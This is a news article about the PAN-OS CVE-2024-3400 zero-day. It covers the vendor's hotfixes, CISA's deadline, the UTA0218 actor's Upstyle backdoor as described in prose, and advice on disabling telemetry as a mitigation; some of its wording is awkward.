Palo Alto Networks (PAN) on April 14 released hotfixes to address a high-severity zero-day bug in multiple versions of its PAN-OS software that a threat actor is using to deploy a new Python backdoor on affected firewalls.
The flaw: tracked as CVE-2024-3400 — is present in PAN-OS 10.2, 11.0, and 11.1 firewalls when the GlobalProtect gateway and device telemetry features are both enabled. PAN revealed the flaw on April 12 after researchers from Volexity found the bug when investigating suspicious activity on a customer’s firewall.
Limited attack
PAN described attacks targeting the flaw as low in volume and attributed the attack activity to a single threat cluster that the company is tracking as “Operation Midnight Eclipse.” However, the vendor did not rule out the possibility that other attackers could also exploit the flaw.
When PAN revealed the flaw last week recommended temporary measures customers could take to mitigate the threat, including disabling device telemetry. On April 14, the company made available hotfix versions of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and all subsequent PAN-OS versions. The security vendor urged customers to apply the updates and promised similar hotfixes for other maintenance releases of the software.
Reports of attackers targeting the flaw before a patch was available prompted the US Cybersecurity and Infrastructure Agency (CISA) last week to quickly add CVE-2024-3400 to its catalog of Known exploited vulnerabilities. All civilian federal agencies have until April 19 to resolve the problem. CISA has organizations previously notified on multiple occasions regarding threat actors’ high interest in VPNs and other remote access technologies from vendors such as Pulse Secure, Cisco, and PAN due to the privileged access these devices provide to corporate networks and data.
Maximum gravity control injection defect
In a blog post last week, Volexity described the discovered flaw as a command injection vulnerability in PAN-OS GlobalProtect that provided remote unauthenticated attackers with a way to execute arbitrary code on affected systems. The security vendor said it observed an attacker, which it is tracking as UTA0218, exploit the flaw to create a reverse shell and download additional malware onto compromised systems.
“The attacker focused on exporting configuration data from devices, then using it as an entry point to move laterally into victim organizations,” Volexity said.
One of the additional tools that the threat actor deployed on compromised systems was a new Python backdoor that Volexity called Upstyle. The security vendor said it discovered that the threat actor was using the Upstyle backdoor to execute a number of additional commands, including those for lateral movement within a target network and to steal credentials and other sensitive data from it .
“The cunning and speed employed by the attacker suggests that this is a highly capable actor with a clear agenda of what to access to achieve their goals,” Volexity warned. Volexity said it was unable to determine the exact scope of the exploit activity, but speculated that it was likely limited and targeted. The company said it found evidence of UTA0218 attempting to exploit the vulnerability in multiple organizations on March 26 and 27.
PAN said its analysis showed that the threat actor uses the backdoor to execute a handful of commands on vulnerable firewalls. The commands included one to copy configuration files and extract them via HTTP requests and another that configured the firewall to receive even more commands, this time from a different URL. “Finally, the threat actors cleaned up by removing all files associated with the backdoors and deleting their cronjobs,” PAN said.
Complete control
Karl Sigler, senior manager of security research at Trustwave’s SpiderLabs, says that exploiting CVE-2024-3400 would give an attacker complete control over the PAN device. “This could give the attacker a foothold to further navigate within the organization,” he says. “It could also allow the attacker to disable protections provided by the device, including disabling access control lists and VPN connections.”
Sigler says the vulnerability exploit in this case works by causing an affected device to log operating system commands to an error log. These commands are then processed and executed with root-level permissions, he says. “Disabling device telemetry disables the log file, short-circuiting the attack,” Sigler notes. “The main risk in doing so is that network administrators often rely on this telemetry to troubleshoot problems with the device. Additionally, monitoring for anomalous network behavior could be evidence of an attack in progress. Disabling telemetry could hinder such efforts.”
Palo Alto itself recommended that organizations that are unable to immediately update their software for any reason disable device telemetry until they are able to update. According to the company, “Once updated, device telemetry should be re-enabled on your device.”